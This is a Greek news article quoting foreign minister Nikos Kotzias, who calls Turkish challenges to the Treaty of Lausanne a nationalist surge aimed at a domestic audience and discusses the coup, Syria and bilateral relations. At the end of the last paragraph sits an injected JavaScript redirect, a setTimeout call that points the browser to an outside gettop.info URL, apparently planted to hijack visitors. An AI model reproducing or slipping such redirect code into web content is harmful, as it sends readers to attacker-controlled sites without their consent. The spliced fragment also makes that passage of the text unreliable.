Κοτζιάς: H εθνική έξαρση της Τουρκίας γίνεται για εσωτερική κατανάλωση

0
8

 

«Δεν θα ήταν παρά μία επιπολαιότητα από μέρους της Τουρκίας να αμφισβητήσει το διεθνές δίκαιο», τόνισε ο υπουργός Εξωτερικών Νίκος Κοτζιάς σχετικά με τις τουρκικές φωνές αμφισβήτησης της Συνθήκης της Λωζάννης και ελληνικών νησιών, μιλώντας σήμερα το πρωί στον ραδιοσταθμό του Alpha, επισημαίνοντας ότι επρόκειτο για «εσωτερικής κατανάλωσης εθνική έξαρση η οποία πάει να συγκαλύψει τα πραγματικά προβλήματα της χώρας και δεν έχει καμία σχέση με τα πραγματικά γεγονότα».

Το ζήτημα της Συνθήκης της Λωζάννης τέθηκε στην εσωτερική κουβέντα που κάνει ο Ερντογάν με τους Κεμαλιστές και στην πολιτική αντιπαράθεση μαζί τους, είπε, σημειώνοντας όμως ότι έχει και εξωτερικές επιπτώσεις.

Η Τουρκία, όπως ανέφερε ο κ. Κοτζιάς, είναι μία νευρική δύναμη και το πραξικόπημα μία κατ’ εξοχήν εκδήλωση νευρικότητας. Εξήγησε, επίσης, ότι η γειτονική χώρα «είναι σε μεγάλο βαθμό σχετικά απομονωμένη, έχει ισχυρά προβλήματα με τη Ρωσία, έχει τα ιστορικά προβλήματα με την Αρμενία, έχει στη Συρία και στο Ιράκ να αντιμετωπίσει έναν πόλεμο» κι υπογράμμισε ότι αυτή τη στιγμή ο καλύτερος γείτονας που μπορεί να έχει είναι η Ελλάδα.

Ο υπουργός Εξωτερικών ανέφερε επίσης ότι μερίδα των τουρκικών ελίτ, πιστεύουν ότι στο πραξικόπημα συμμετείχαν και τμήματα των μυστικών υπηρεσιών και με βάση αυτό προσπαθούν να δημιουργήσουν, σε χώρες που τις κατηγορούν ότι ενεπλάκησαν στο πραξικόπημα, τύψεις και να απαιτήσουν κέρδη. «Τι κέρδη; Κατ’ αρχάς το συριακό. Εκεί ορισμένες δυτικές δυνάμεις είναι σε μια αντίφαση που δεν μπορούν να λύσουν στρατηγικά, αν θα υποστηρίξουν τους Τούρκους ή τους Κούρδους της Συρίας».

Στην Τουρκία, όπως τόνισε ο κ. Κοτζιάς, αφενός «εμείς υπογραμμίζουμε την πολιτική μας αρχών και αξιών, ότι πρέπει και η ίδια να εξευρωπαϊστεί, να εκδημοκρατιστεί περαιτέρω και να αποδεχθεί την εφαρμογή του διεθνούς δικαίου και του δικαίου θαλάσσης, όπως και του ευρωπαϊκού κεκτημένου» και αφετέρου «κρατάμε όλα τα κανάλια ανοιχτά σε όλα τα επίπεδα για να αναζητούμε λύσεις. Σε πολλούς τομείς (τουρισμό, μεταφορές) έχουμε πολύ καλές σχέσεις που βοηθούν την οικονομία συνολικά. Έχουμε θετικά βήματα αλλά ταυτόχρονα πάντα είμαστε πολύ προσεκτικοί, γιατί υπάρχουν δυνάμεις του τουρκικού κατεστημένου που σκέπτονται αναθεωρητικά και πρέπει να αντιλαμβάνονται ότι δεν τους παίρνει να ελπίζουν ότι μπορούν να υλοποιήσουν αναθεωρητικά σχέδια». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here